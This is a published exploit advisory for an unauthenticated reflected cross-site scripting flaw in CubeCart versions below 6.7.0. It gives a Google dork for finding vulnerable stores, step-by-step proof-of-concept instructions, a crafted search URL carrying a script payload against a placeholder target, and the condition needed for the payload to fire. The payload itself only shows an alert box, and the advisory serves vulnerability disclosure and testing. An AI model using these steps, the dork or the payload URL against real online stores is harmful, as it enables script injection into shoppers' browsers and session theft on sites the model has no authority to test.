# Exploit Title: CubeCart < 6.7.0 - Reflected Cross-Site Scripting
# Google Dork: intext:"Powered by CubeCart"
# Date: 2026-04-12
# Exploit Author: Th3-SAx11 ( https://github.com/Th3-SAx11 )
# Vendor Homepage: https://www.cubecart.com/
# Software Link: https://www.cubecart.com/download
# Version: 6.x.x
# Tested on: Kali Linux / Windows 10 / Firefox
# CVE: CVE-2026-44376
# Vulnerability Description:
An Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability exists in CubeCart.
The application fails to properly sanitize user-supplied input in the search or catalogue modules
before outputting it back to the user. An unauthenticated attacker can inject malicious
JavaScript payloads that will be executed in the context of the victim's browser.
# Proof of Concept (PoC):
1- Go to the Search Bar on the homepage.
2- Enter a product name that has exactly one result (e.g., SAMSUNG) followed by the payload:
SAMSUNG <script>alert("Test!")</script>
3- Press Enter.
4- Observe the alert box popping up on the screen, confirming the XSS execution.
# Alternative (Direct Link):
https://[TARGET]/cubecart/search?search[keywords]=SAMSUNG%20<script>alert("Test!")</script>&_a=category
# Important Note for Reproduction
For the payload to execute successfully, the search query must include a valid keyword
that matches exactly ONE existing product in the store's database (e.g., SAMSUNG).
If the search returns 0 or multiple products, the payload will not trigger.
